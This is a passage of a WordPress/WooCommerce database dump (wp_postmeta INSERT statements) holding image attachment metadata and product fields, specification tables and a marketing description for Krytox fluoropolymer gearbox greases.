INSERT INTO `wp_postmeta` VALUES (33085, 3714, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_503819962.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_503819962-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_503819962-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_503819962-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_503819962-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_503819962-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_503819962-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_503819962-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33086, 3715, '_wp_attached_file', '2017/02/shutterstock_491242234.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33087, 3715, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_491242234.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_491242234-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_491242234-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_491242234-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_491242234-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_491242234-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_491242234-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_491242234-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33088, 3716, '_wp_attached_file', '2017/02/shutterstock_245717290.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33089, 3716, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:694;s:4:"file";s:34:"2017/02/shutterstock_245717290.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_245717290-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_245717290-800x555.jpg";s:5:"width";i:800;s:6:"height";i:555;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_245717290-768x533.jpg";s:5:"width";i:768;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_245717290-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_245717290-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_245717290-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_245717290-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33090, 3717, '_wp_attached_file', '2017/02/shutterstock_391175785.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33091, 3717, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/02/shutterstock_391175785.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_391175785-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_391175785-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_391175785-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_391175785-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_391175785-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_391175785-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_391175785-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33092, 3718, '_wp_attached_file', '2017/02/shutterstock_71187163.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33093, 3718, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:1000;s:4:"file";s:33:"2017/02/shutterstock_71187163.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_71187163-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_71187163-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_71187163-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_71187163-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_71187163-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_71187163-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_71187163-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:63;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33094, 3719, '_edit_lock', '1487964890:2'); 
INSERT INTO `wp_postmeta` VALUES (33095, 3719, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33096, 3719, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (33097, 3719, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (33098, 3719, '_thumbnail_id', '3721'); 
INSERT INTO `wp_postmeta` VALUES (33099, 3719, '312_default_editor', '<table width="1093">\r\n<tbody>\r\n<tr>\r\n<td width="373"><strong>Krytox Gearbox Grease Grade</strong></td>\r\n<td style="text-align: center;" width="180">GB M0</td>\r\n<td style="text-align: center;" width="180">GB H0</td>\r\n<td style="text-align: center;" width="180">GB A2</td>\r\n<td style="text-align: center;" width="180">GB C2</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration, ASTM D217</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">265–295</td>\r\n<td style="text-align: center;">265–295</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener Chemistry</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point, °C (°F)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, 40 °C (104 °F)</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Useful Temperature Range, °C (°F)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33100, 3719, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33101, 3719, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33102, 3719, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33103, 3719, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33104, 3719, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33105, 3719, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (33106, 3719, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33107, 3719, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33108, 3719, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33109, 3719, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33110, 3719, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33111, 3719, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (33112, 3719, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33113, 3719, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (33114, 3719, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (33115, 3719, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (33116, 3719, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (33117, 3719, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33118, 3719, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33119, 3719, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33120, 3719, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (33121, 3719, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (33122, 3719, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33123, 3719, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (33124, 3719, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33125, 3719, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33126, 3719, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (33127, 3719, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33128, 3719, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33129, 3719, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (33130, 3719, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33131, 3719, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33132, 3719, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (33133, 3719, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (33134, 3719, '_ywtm_content_tab_description', '<h3>Krytox GB M0 | Sootblower | Gearbox Grease | Premium Performance Gearbox Greases</h3>\r\nPerformance Lubricants has developed a series of greases specifically designed to lubricate and protect high temperature gearbox gears, bearings, and seals. Krytox™ fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments, even in applications with operating temperatures up to approximately 270 °C (518 °F). Use of Krytox™ gearbox grease will help eliminate bearing and gear failures resulting from lubricant oxidation, lead to longer seal life, and extend gearbox life. In many applications, Krytox GB M0 gearbox grease will last the life of the gearbox, greatly reducing\r\nor eliminating the need for maintenance and re-lubrication. When compared to oil-lubricated systems, use of Krytox™ grease can also significantly help reduce lubricant leakage related to seal failure.\r\n\r\nKrytox™ gearbox greases are available in various base oil viscosities to provide the best performance for your given environment. There are currently two grades of premium performance gearbox grease, Krytox™ GB M0 and GB H0, which are semi-fluid lubricants specifically designed for enclosed gearbox lubrication. As many gearbox designs utilize bearings that are not lubricated by the internal lubricant reservoir and require periodic re-lubrication (and this grease is often forced past the bearing seals into the reservoir), Krytox™ GB A2 and C2 have been added to the line to limit cross-contamination of the internal grease with a non-compatible bearing grease.\r\n\r\nPlease consult with Krytox™ <a href="https://www.miller-stephenson.com/tech-support/">Technical Service</a> to determine if one of these grades is right for your application or if an additional grade is required.\r\n\r\nKrytox™ greases are made from clear, colorless fluorinated, synthetic oils that are non-reactive, non-flammable, safe in harsh environments, long lasting, and compatible with all seal materials. Krytox™ is a perfluoropolyether-based polymer composed of fluorine, oxygen, and carbon. No hydrogen is present in the molecule, resulting in exceptional stability and non-flammability.'); 
INSERT INTO `wp_postmeta` VALUES (33135, 3719, '_product_image_gallery', '383'); 
INSERT INTO `wp_postmeta` VALUES (33136, 3719, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (33137, 3719, '_yoast_wpseo_primary_product_cat', '515'); 
INSERT INTO `wp_postmeta` VALUES (33138, 3719, '_yoast_wpseo_focuskw_text_input', 'Krytox GB H0'); 
INSERT INTO `wp_postmeta` VALUES (33139, 3719, '_yoast_wpseo_focuskw', 'Krytox GB H0'); 
INSERT INTO `wp_postmeta` VALUES (33140, 3719, '_yoast_wpseo_title', 'Krytox GB H0 | Krytox Sootblower Gearbox Grease | Performance Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (33141, 3719, '_yoast_wpseo_metadesc', 'Krytox GB H0 fluoropolymer greases provide excellent lubrication and will not oxidize in the most demanding high temperature environments.'); 
INSERT INTO `wp_postmeta` VALUES (33142, 3719, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (33143, 3719, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (33144, 3719, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (33157, 3719, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (33158, 3719, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (33159, 3721, '_wp_attached_file', '2017/02/shutterstock_322483565.jpg'); 
INSERT INTO `wp_postmeta` VALUES (33160, 3721, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:664;s:4:"file";s:34:"2017/02/shutterstock_322483565.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_322483565-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_322483565-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_322483565-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_322483565-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_322483565-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_322483565-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_322483565-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (33161, 3722, '_edit_lock', '1487965426:2'); 
INSERT INTO `wp_postmeta` VALUES (33162, 3722, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (33163, 3722, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (33164, 3722, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (33165, 3722, '_thumbnail_id', '3723'); 
INSERT INTO `wp_postmeta` VALUES (33166, 3722, '312_default_editor', '<table width="1093">\r\n<tbody>\r\n<tr>\r\n<td width="373"><strong>Krytox Gearbox Grease Grade</strong></td>\r\n<td style="text-align: center;" width="180">GB M0</td>\r\n<td style="text-align: center;" width="180">GB H0</td>\r\n<td style="text-align: center;" width="180">GB A2</td>\r\n<td style="text-align: center;" width="180">GB C2</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">0</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Penetration, ASTM D217</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">355–385</td>\r\n<td style="text-align: center;">265–295</td>\r\n<td style="text-align: center;">265–295</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener Chemistry</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n<td style="text-align: center;">PTFE</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point, °C (°F)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n<td style="text-align: center;">&gt;290 (&gt;554)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, 40 °C (104 °F)</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>Estimated Useful Temperature Range, °C (°F)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n<td style="text-align: center;">-40–210 (-40–410)</td>\r\n<td style="text-align: center;">-4–270 (25–518)</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n<td style="text-align: center;">Gray, Creamy</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n<td style="text-align: center;">2.1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33167, 3722, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33168, 3722, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33169, 3722, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33170, 3722, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (33171, 3722, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (33172, 3722, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (33173, 3722, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33174, 3722, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33175, 3722, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (33176, 3722, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33177, 3722, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33178, 3722, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (33179, 3722, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33180, 3722, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (33181, 3722, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (33182, 3722, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (33183, 3722, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (33184, 3722, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33185, 3722, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33186, 3722, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33187, 3722, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (33188, 3722, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (33189, 3722, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (33190, 3722, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (33191, 3722, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33192, 3722, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33193, 3722, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (33194, 3722, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33195, 3722, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (33196, 3722, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (33197, 3722, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33198, 3722, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (33199, 3722, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (33200, 3722, '_ywtm_title_tab_description', 'Description'); 
